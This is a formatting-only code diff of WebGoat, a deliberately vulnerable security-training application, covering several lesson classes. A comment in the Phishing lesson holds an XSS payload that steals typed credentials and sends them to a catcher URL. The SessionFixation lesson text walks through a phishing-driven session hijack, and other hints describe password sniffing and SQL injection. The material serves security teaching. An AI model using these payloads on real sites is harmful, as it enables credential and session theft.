@ -164,9 +167,6 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
/**
|
||||
* Gets the category attribute of the ForgotPassword object
|
||||
*
|
||||
@ -187,17 +187,12 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
{
|
||||
List<String> hints = new ArrayList<String>();
|
||||
|
||||
hints.add("Stage 1: Use a sniffer to record " +
|
||||
"the traffic");
|
||||
hints.add("Stage 1: Use a sniffer to record " + "the traffic");
|
||||
hints.add("Stage 1: What Protocol does the request use?");
|
||||
hints.add("Stage 1: What kind of request is started when " +
|
||||
"you click on the button?");
|
||||
hints.add("Stage 1: Take a closer look at the HTTP Post request in " +
|
||||
"your sniffer");
|
||||
hints.add("Stage 1: What kind of request is started when " + "you click on the button?");
|
||||
hints.add("Stage 1: Take a closer look at the HTTP Post request in " + "your sniffer");
|
||||
hints.add("Stage 1: The password field has the name clear_pass");
|
||||
|
||||
|
||||
|
||||
return hints;
|
||||
}
|
||||
|
||||
@ -219,25 +214,22 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getInstructions(WebSession s) {
|
||||
public String getInstructions(WebSession s)
|
||||
{
|
||||
int stage = getLessonTracker(s).getStage();
|
||||
String instructions = "";
|
||||
instructions = "<b>For this lesson you need to " +
|
||||
"have a server client setup. Please refer to the" +
|
||||
"Tomcat Configuration in the Introduction section.</b><br><br> Stage" +
|
||||
stage + ": ";
|
||||
instructions = "<b>For this lesson you need to " + "have a server client setup. Please refer to the"
|
||||
+ "Tomcat Configuration in the Introduction section.</b><br><br> Stage" + stage + ": ";
|
||||
if (stage == 1)
|
||||
{
|
||||
instructions += "In this stage you have to sniff the " +
|
||||
"password. And answer the question after the login.";
|
||||
instructions += "In this stage you have to sniff the "
|
||||
+ "password. And answer the question after the login.";
|
||||
}
|
||||
if (stage == 2)
|
||||
{
|
||||
instructions += "Now you have to change to a secure " +
|
||||
"connection. The URL should start with https:// " +
|
||||
"If your browser is complaining about the certificate just " +
|
||||
"ignore it. Sniff again the traffic and answer the" +
|
||||
" questions";
|
||||
instructions += "Now you have to change to a secure " + "connection. The URL should start with https:// "
|
||||
+ "If your browser is complaining about the certificate just "
|
||||
+ "ignore it. Sniff again the traffic and answer the" + " questions";
|
||||
}
|
||||
return instructions;
|
||||
}
|
||||
@ -273,8 +265,7 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -282,8 +273,7 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -359,7 +349,6 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
ec.addElement(createSSLQuestionContent());
|
||||
}
|
||||
|
||||
|
||||
return ec;
|
||||
}
|
||||
|
||||
@ -430,7 +419,6 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
protocolSelect.addElement(tlsOption);
|
||||
td4.addElement(protocolSelect);
|
||||
|
||||
|
||||
div.addElement(selectTable);
|
||||
|
||||
div.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
|
||||
@ -463,8 +451,7 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -472,8 +459,7 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
@ -144,8 +144,6 @@ public abstract class LessonAdapter extends AbstractLesson
|
||||
return hints;
|
||||
}
|
||||
|
||||
|
||||
|
||||
/**
|
||||
* Gets the credits attribute of the AbstractLesson object
|
||||
*
|
||||
|
||||
@ -143,26 +143,26 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
style sty = new style();
|
||||
|
||||
sty
|
||||
.addElement("#lesson_wrapper {height: 435px;width: " +
|
||||
"500px;}#lesson_header {background-image: " +
|
||||
"url(lessons/DBSQLInjection/images/lesson1_header.jpg);width:" +
|
||||
" 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace " +
|
||||
"{background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: " +
|
||||
"325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} " +
|
||||
".lesson_text {height: 240px;width: 460px;padding-top: 5px;} " +
|
||||
"#lesson_buttons_bottom {height: 20px;width: 460px;} " +
|
||||
"#lesson_b_b_left {width: 300px;float: left;} " +
|
||||
"#lesson_b_b_right input {width: 100px;float: right;} " +
|
||||
".lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} " +
|
||||
".lesson_workspace { } " +
|
||||
".lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} " +
|
||||
".lesson_text_db {color: #0066FF} " +
|
||||
"#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: " +
|
||||
"124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top:" +
|
||||
" 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: " +
|
||||
"12px;text-align: center;} #lesson_search {background-image: " +
|
||||
"url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: " +
|
||||
"no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
|
||||
.addElement("#lesson_wrapper {height: 435px;width: "
|
||||
+ "500px;}#lesson_header {background-image: "
|
||||
+ "url(lessons/DBSQLInjection/images/lesson1_header.jpg);width:"
|
||||
+ " 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace "
|
||||
+ "{background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: "
|
||||
+ "325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} "
|
||||
+ ".lesson_text {height: 240px;width: 460px;padding-top: 5px;} "
|
||||
+ "#lesson_buttons_bottom {height: 20px;width: 460px;} "
|
||||
+ "#lesson_b_b_left {width: 300px;float: left;} "
|
||||
+ "#lesson_b_b_right input {width: 100px;float: right;} "
|
||||
+ ".lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} "
|
||||
+ ".lesson_workspace { } "
|
||||
+ ".lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} "
|
||||
+ ".lesson_text_db {color: #0066FF} "
|
||||
+ "#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: "
|
||||
+ "124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top:"
|
||||
+ " 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: "
|
||||
+ "12px;text-align: center;} #lesson_search {background-image: "
|
||||
+ "url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: "
|
||||
+ "no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
|
||||
ec.addElement(sty);
|
||||
|
||||
Div wrapperDiv = new Div();
|
||||
@ -501,8 +501,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -510,8 +509,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -538,8 +536,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -547,8 +544,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -594,8 +590,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -603,8 +598,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -638,8 +632,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -647,8 +640,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -700,8 +692,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -740,8 +731,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -749,8 +739,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
@ -502,8 +502,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -511,8 +510,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -545,8 +543,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -554,8 +551,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -583,8 +579,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -592,8 +587,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -634,8 +628,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -643,8 +636,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -686,8 +678,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -695,8 +686,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -749,8 +739,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -758,8 +747,7 @@ public class MultiLevelLogin2 extends LessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
@ -226,12 +226,12 @@ public class Phishing extends LessonAdapter
|
||||
* password<script>function hack(){ alert("Had this been a real attack... Your credentials
|
||||
* were just stolen.\nUser Name = " + document.forms[0].user.value + "\nPassword = " +
|
||||
* document.forms[0].pass.value); XSSImage=new Image;
|
||||
* XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value +
|
||||
* "&password=" + document.forms[0].pass.value + "";}</script><form><br>
|
||||
* XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
|
||||
* +document.forms[0].user.value + "&password=" + document.forms[0].pass.value +
|
||||
* "";}</script><form><br>
|
||||
* <br>
|
||||
* <HR>
|
||||
* <H3>This feature requires account login:</H2>
|
||||
* <br>
|
||||
* <H3>This feature requires account login:</H2> <br>
|
||||
* <br>
|
||||
* Enter Username:<br>
|
||||
* <input type="text" id="user" name="user"><br>
|
||||
|
||||
@ -85,7 +85,8 @@ public class RemoteAdminFlaw extends LessonAdapter
|
||||
List<String> hints = new ArrayList<String>();
|
||||
hints.add("WebGoat has 2 admin interfaces.");
|
||||
hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
|
||||
hints.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
|
||||
hints
|
||||
.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
|
||||
hints.add("Follow the Source!");
|
||||
hints.add("On success you will see new submenu items in the menupoint 'Admin Functions'");
|
||||
|
||||
|
||||
@ -97,8 +97,8 @@ public class EditProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
@ -145,8 +145,8 @@ public class EditProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
|
||||
@ -93,7 +93,6 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
|
||||
return Category.ACCESS_CONTROL;
|
||||
}
|
||||
|
||||
|
||||
/**
|
||||
* Gets the hints attribute of the DirectoryScreen object
|
||||
*
|
||||
@ -111,18 +110,15 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
|
||||
|
||||
hints.add("Stage1: How does the application know that the user selected the delete function?");
|
||||
|
||||
|
||||
hints.add("Stage2: You have to code to check the authorization of the user for the action.");
|
||||
// Stage 2
|
||||
|
||||
|
||||
|
||||
// Stage 3
|
||||
hints.add("Stage3: How does the application know that the user selected any particular employee to view?");
|
||||
|
||||
|
||||
// Stage 4
|
||||
hints.add("Stage4: You have to code to check the authorization of the user for the action on a certain employee.");
|
||||
hints
|
||||
.add("Stage4: You have to code to check the authorization of the user for the action on a certain employee.");
|
||||
|
||||
return hints;
|
||||
}
|
||||
@ -155,8 +151,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
|
||||
}
|
||||
else if (STAGE2.equals(stage))
|
||||
{
|
||||
instructions ="Stage 2: Add Business Layer Access Control.<br><br/>" +
|
||||
"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
instructions = "Stage 2: Add Business Layer Access Control.<br><br/>"
|
||||
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
+ "Implement a fix to deny unauthorized access to the Delete function. "
|
||||
+ "Repeat stage 1. Verify that access to Delete is properly denied.<br/>"
|
||||
+ "To do this you have to alter code.";
|
||||
@ -168,8 +164,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
|
||||
}
|
||||
else if (STAGE4.equals(stage))
|
||||
{
|
||||
instructions = "Stage 4: Add Data Layer Access Control.<br><br/>" +
|
||||
"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
instructions = "Stage 4: Add Data Layer Access Control.<br><br/>"
|
||||
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
+ "Implement a fix to deny unauthorized access to this data. "
|
||||
+ "Repeat stage 3. Verify that access to other employee's profiles is properly denied.";
|
||||
}
|
||||
@ -178,7 +174,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
|
||||
return instructions;
|
||||
}
|
||||
|
||||
public String getLessonSolutionFileName(WebSession s) {
|
||||
public String getLessonSolutionFileName(WebSession s)
|
||||
{
|
||||
String solutionFileName = null;
|
||||
String stage = getStage(s);
|
||||
solutionFileName = "/lesson_solutions/Lab Access Control/Lab " + stage + ".html";
|
||||
@ -186,12 +183,14 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getSolution(WebSession s) {
|
||||
public String getSolution(WebSession s)
|
||||
{
|
||||
String src = null;
|
||||
|
||||
try
|
||||
{
|
||||
src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false);
|
||||
src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
|
||||
false);
|
||||
} catch (IOException e)
|
||||
{
|
||||
s.setMessage("Could not find the solution file");
|
||||
@ -235,8 +234,6 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
|
||||
{
|
||||
// ***************CODE HERE*************************
|
||||
|
||||
|
||||
|
||||
// *************************************************
|
||||
if (action.isAuthenticated(s))
|
||||
{
|
||||
|
||||
@ -125,8 +125,8 @@ public class ViewProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
@ -171,8 +171,8 @@ public class ViewProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
|
||||
@ -250,12 +250,14 @@ public class SQLInjection extends GoatHillsFinancial
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getSolution(WebSession s) {
|
||||
public String getSolution(WebSession s)
|
||||
{
|
||||
String src = null;
|
||||
|
||||
try
|
||||
{
|
||||
src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false);
|
||||
src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
|
||||
false);
|
||||
} catch (IOException e)
|
||||
{
|
||||
s.setMessage("Could not find the solution file");
|
||||
@ -264,7 +266,8 @@ public class SQLInjection extends GoatHillsFinancial
|
||||
return src;
|
||||
}
|
||||
|
||||
public String getLessonSolutionFileName(WebSession s) {
|
||||
public String getLessonSolutionFileName(WebSession s)
|
||||
{
|
||||
String solutionFileName = null;
|
||||
String stage = getStage(s);
|
||||
solutionFileName = "/lesson_solutions/Lab SQL Injection/Lab " + stage + ".html";
|
||||
|
||||
@ -119,8 +119,8 @@ public class ViewProfile extends DefaultLessonAction
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
// System.out.println("Profile: " + profile);
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
@ -167,8 +167,8 @@ public class ViewProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
|
||||
@ -3,7 +3,6 @@ package org.owasp.webgoat.lessons;
|
||||
|
||||
import java.util.ArrayList;
|
||||
import java.util.List;
|
||||
|
||||
import org.apache.ecs.Element;
|
||||
import org.apache.ecs.ElementContainer;
|
||||
import org.apache.ecs.StringElement;
|
||||
|
||||
@ -7,7 +7,6 @@ import java.sql.ResultSet;
|
||||
import java.util.ArrayList;
|
||||
import java.util.List;
|
||||
import java.util.Random;
|
||||
|
||||
import org.apache.ecs.Element;
|
||||
import org.apache.ecs.ElementContainer;
|
||||
import org.apache.ecs.StringElement;
|
||||
@ -231,9 +230,9 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
private Element createStage4Content(WebSession s)
|
||||
{
|
||||
ElementContainer ec = new ElementContainer();
|
||||
ec.addElement("<h2>Jane has logged into her account. Go and grab her session!" +
|
||||
" Use Following link to reach the login screen of the bank:</h2><br><br>" +
|
||||
"<a href=" + super.getLink() +"&SID=NOVALIDSESSION><center> Goat Hills Financial </center></a><br><br><br><br>");
|
||||
ec.addElement("<h2>Jane has logged into her account. Go and grab her session!"
|
||||
+ " Use Following link to reach the login screen of the bank:</h2><br><br>" + "<a href="
|
||||
+ super.getLink() + "&SID=NOVALIDSESSION><center> Goat Hills Financial </center></a><br><br><br><br>");
|
||||
return ec;
|
||||
// return createMainLoginContent(s);
|
||||
}
|
||||
@ -446,7 +445,6 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
return ec;
|
||||
}
|
||||
|
||||
|
||||
/**
|
||||
* See if the password and corresponding user is valid
|
||||
*
|
||||
@ -478,8 +476,7 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -487,14 +484,12 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
return false;
|
||||
|
||||
}
|
||||
@ -650,8 +645,7 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
finally
|
||||
} finally
|
||||
{
|
||||
try
|
||||
{
|
||||
@ -659,8 +653,7 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
{
|
||||
connection.close();
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -716,8 +709,6 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
hints.add("Stage 4: What is your actual SID?");
|
||||
hints.add("Stage 4: Change the SID (NOVALIDSESSION) to the choosen one in the mail");
|
||||
|
||||
|
||||
|
||||
return hints;
|
||||
|
||||
}
|
||||
@ -735,32 +726,29 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
String instructions = "STAGE " + stage + ": ";
|
||||
if (stage == 1)
|
||||
{
|
||||
instructions += "You are Hacker Joe and " +
|
||||
"you want to steal the session from Jane. " +
|
||||
"Send a prepared email to the victim " +
|
||||
"which looks like an official email from the bank. " +
|
||||
"A template message is prepared below, you will need to add " +
|
||||
"a Session ID (SID) in the link inside the email. Alter " +
|
||||
"the link to include a SID.<br><br><b>You are: Hacker Joe</b>";
|
||||
instructions += "You are Hacker Joe and " + "you want to steal the session from Jane. "
|
||||
+ "Send a prepared email to the victim " + "which looks like an official email from the bank. "
|
||||
+ "A template message is prepared below, you will need to add "
|
||||
+ "a Session ID (SID) in the link inside the email. Alter "
|
||||
+ "the link to include a SID.<br><br><b>You are: Hacker Joe</b>";
|
||||
}
|
||||
else if (stage == 2)
|
||||
{
|
||||
instructions += "Now you are the victim Jane who received the email below. " +
|
||||
"If you point on the link with your mouse you will see that there is a SID included. " +
|
||||
"Click on it to see what happens.<br><br><b>You are: Victim Jane</b> ";
|
||||
instructions += "Now you are the victim Jane who received the email below. "
|
||||
+ "If you point on the link with your mouse you will see that there is a SID included. "
|
||||
+ "Click on it to see what happens.<br><br><b>You are: Victim Jane</b> ";
|
||||
}
|
||||
else if (stage == 3)
|
||||
{
|
||||
instructions += "The bank has asked you to verfy your data. Log in to see if your details are " +
|
||||
"correct. Your user name is <b>Jane</b> and your password is <b>tarzan</b>. <br><br><b>You are: Victim Jane</b> ";
|
||||
instructions += "The bank has asked you to verfy your data. Log in to see if your details are "
|
||||
+ "correct. Your user name is <b>Jane</b> and your password is <b>tarzan</b>. <br><br><b>You are: Victim Jane</b> ";
|
||||
}
|
||||
else if (stage == 4)
|
||||
{
|
||||
instructions += "It is time to steal the session now. Use following link to reach Goat Hills " +
|
||||
"Financial.<br><br><b>You are: Hacker Joe</b> ";
|
||||
instructions += "It is time to steal the session now. Use following link to reach Goat Hills "
|
||||
+ "Financial.<br><br><b>You are: Hacker Joe</b> ";
|
||||
}
|
||||
|
||||
|
||||
return (instructions);
|
||||
}
|
||||
|
||||
@ -798,14 +786,10 @@ public class SessionFixation extends SequentialLessonAdapter
|
||||
public String getLink()
|
||||
{
|
||||
|
||||
if(sid.equals(""))
|
||||
{
|
||||
return super.getLink();
|
||||
}
|
||||
if (sid.equals("")) { return super.getLink(); }
|
||||
return super.getLink() + "&SID=" + sid;
|
||||
}
|
||||
|
||||
|
||||
private String randomSIDGenerator()
|
||||
{
|
||||
String sid = "";
|
||||
|
||||
@ -56,8 +56,8 @@ import org.owasp.webgoat.session.WebgoatContext;
|
||||
*
|
||||
* @author asmolen
|
||||
*
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences - Java -
|
||||
* Code Style - Code Templates
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences -
|
||||
* Java - Code Style - Code Templates
|
||||
*/
|
||||
public class SoapRequest extends SequentialLessonAdapter
|
||||
{
|
||||
|
||||
@ -310,13 +310,13 @@ public class SqlNumericInjection extends SequentialLessonAdapter
|
||||
protected List<String> getHints(WebSession s)
|
||||
{
|
||||
List<String> hints = new ArrayList<String>();
|
||||
hints.add("The application is taking the input from the select box and inserts it at the end of a pre-formed SQL command.");
|
||||
hints
|
||||
.add("The application is taking the input from the select box and inserts it at the end of a pre-formed SQL command.");
|
||||
hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
|
||||
+ "\"SELECT * FROM weather_data WHERE station = \" + station ");
|
||||
